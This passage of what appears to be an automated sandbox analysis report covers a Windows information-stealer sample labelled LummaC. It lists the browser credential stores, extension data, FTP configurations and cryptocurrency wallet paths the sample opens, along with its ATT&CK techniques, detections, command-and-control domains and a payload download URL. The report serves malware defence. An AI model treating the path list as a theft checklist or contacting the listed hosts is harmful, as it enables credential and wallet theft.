        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1831.tmp.exeDirectory queried: number of queries: 1001
        Source: Yara matchFile source: 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 1831.tmp.exe PID: 6556, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: 1831.tmp.exe PID: 6556, type: MEMORYSTR
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02121B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02121B33
        Source: C:\Users\user\Desktop\K27Yg4V48M.exeCode function: 0_2_02120E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02120E5D
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        12
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        Boot or Logon Initialization Scripts11
        Process Injection
        4
        Obfuscated Files or Information
        LSASS Memory22
        File and Directory Discovery
        Remote Desktop Protocol41
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        Logon Script (Windows)Logon Script (Windows)22
        Software Packing
        Security Account Manager44
        System Information Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading
        NTDS1
        Query Registry
        Distributed Component Object Model3
        Clipboard Data
        124
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets131
        Security Software Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Virtualization/Sandbox Evasion
        Cached Domain Credentials1
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection
        DCSync1
        Process Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        Application Window Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        K27Yg4V48M.exe50%ReversingLabsWin32.Trojan.Generic
        K27Yg4V48M.exe43%VirustotalBrowse
        K27Yg4V48M.exe100%AviraHEUR/AGEN.1306978
        K27Yg4V48M.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\1831.tmp.exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1306978
        C:\Users\user\AppData\Local\Temp\1831.tmp.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe53%ReversingLabsWin32.Exploit.LummaC
        C:\Users\user\AppData\Local\Temp\1831.tmp.exe53%ReversingLabsWin32.Exploit.LummaC
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://cloudewahsj.shop:443/api100%Avira URL Cloudmalware
        https://cloudewahsj.shop/q100%Avira URL Cloudmalware
        https://cloudewahsj.shop/apiz100%Avira URL Cloudmalware
        https://cloudewahsj.shop/apie;100%Avira URL Cloudmalware
        https://cloudewahsj.shop/api100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exe.100%Avira URL Cloudmalware
        https://post-to-me.com/track_prt.php?sub=0&cc=DE3100%Avira URL Cloudmalware
        https://cloudewahsj.shop/d100%Avira URL Cloudmalware
        https://cloudewahsj.shop/apio100%Avira URL Cloudmalware
        https://post-to-me.com/p100%Avira URL Cloudmalware
        https://cloudewahsj.shop/100%Avira URL Cloudmalware
        http://176.113.115.19/ScreenUpdateSync.exe;100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        post-to-me.com
        104.21.56.70
        truefalse
          high
          cloudewahsj.shop
          104.21.112.1
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            rabidcowse.shopfalse
              high
              wholersorie.shopfalse
                high
                https://cloudewahsj.shop/apitrue
                • Avira URL Cloud: malware
                unknown
                cloudewahsj.shopfalse
                  high
                  noisycuttej.shopfalse
                    high
                    nearycrepso.shopfalse
                      high
                      https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                        high
                        framekgirus.shopfalse
                          high
                          tirepublicerj.shopfalse
                            high
                            abruptyopsn.shopfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://post-to-me.com/track_prt.php?sub=&cc=DEK27Yg4V48M.exe, 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                high
                                https://cloudewahsj.shop:443/api1831.tmp.exe, 00000002.00000003.2125193195.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2124952451.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2124408100.0000000002F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://duckduckgo.com/chrome_newtab1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://cloudewahsj.shop/q1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://duckduckgo.com/ac/?q=1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://176.113.115.19/ScreenUpdateSync.exe.K27Yg4V48M.exe, 00000000.00000002.4481263101.000000000068B000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.2046141104.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000068B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://cloudewahsj.shop/d1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.rootca1.amazontrust.com/rootca1.crl01831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://upx.sf.netAmcache.hve.5.drfalse
                                            high
                                            https://cloudewahsj.shop/apie;1831.tmp.exe, 00000002.00000003.2077120697.00000000004B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://cloudewahsj.shop/apiz1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://post-to-me.com/track_prt.php?sub=0&cc=DE3K27Yg4V48M.exe, 00000000.00000003.4317071653.0000000000673000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.0000000000673000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://ocsp.rootca1.amazontrust.com0:1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.ecosia.org/newtab/1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://176.113.115.19/ScreenUpdateSync.exeK27Yg4V48M.exe, 00000000.00000003.2046141104.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000068B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ac.ecosia.org/autocomplete?q=1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWAREK27Yg4V48M.exe, 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                          high
                                                          https://post-to-me.com/track_prt.php?sub=K27Yg4V48M.exefalse
                                                            high
                                                            https://cloudewahsj.shop/apio1831.tmp.exe, 00000002.00000002.2277491965.0000000000512000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://x1.c.lencr.org/01831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/01831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search1831.tmp.exe, 00000002.00000003.2078434280.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2078045127.0000000002F16000.00000004.00000800.00020000.00000000.sdmp, 1831.tmp.exe, 00000002.00000003.2077969426.0000000002F19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?1831.tmp.exe, 00000002.00000003.2108400286.0000000002FED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://post-to-me.com/pK27Yg4V48M.exe, 00000000.00000003.4317071653.0000000000673000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.0000000000673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://cloudewahsj.shop/1831.tmp.exe, 00000002.00000002.2277491965.00000000004B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://post-to-me.com/K27Yg4V48M.exe, 00000000.00000003.4317071653.0000000000673000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000002.4481263101.0000000000673000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://176.113.115.19/ScreenUpdateSync.exe;K27Yg4V48M.exe, 00000000.00000002.4481263101.000000000068B000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.2046141104.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, K27Yg4V48M.exe, 00000000.00000003.4317071653.000000000068B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://support.mozilla.org/products/firefoxgro.all1831.tmp.exe, 00000002.00000003.2109258315.0000000003205000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
